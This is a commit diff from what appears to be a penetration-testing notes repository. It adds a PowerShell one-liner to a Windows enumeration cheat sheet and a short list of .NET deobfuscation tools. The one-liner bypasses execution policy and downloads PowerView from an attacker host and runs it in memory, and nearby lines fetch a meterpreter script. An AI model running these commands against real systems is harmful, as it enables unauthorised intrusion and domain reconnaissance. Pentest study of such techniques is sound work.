whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
Stefan Friese 2022-04-20 00:03:16 +02:00
parent 495e5c972f
commit d6c6127cb4
3 changed files with 9 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
enumeration/hydra.restore Normal file
View File

Binary file not shown.

5
enumeration/windows/powershell.md
View File

@ -129,6 +129,11 @@ Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1') (New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
``` ```
* Webrequest and execute in one go
```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
```
## Base64 Decode File ## Base64 Decode File
``` ```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt))) [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))

4
reverse_engineering/docs/deobfuscation.md Normal file
View File

@ -0,0 +1,4 @@
# Deobfuscation
* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator
* In case of dotnet: Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well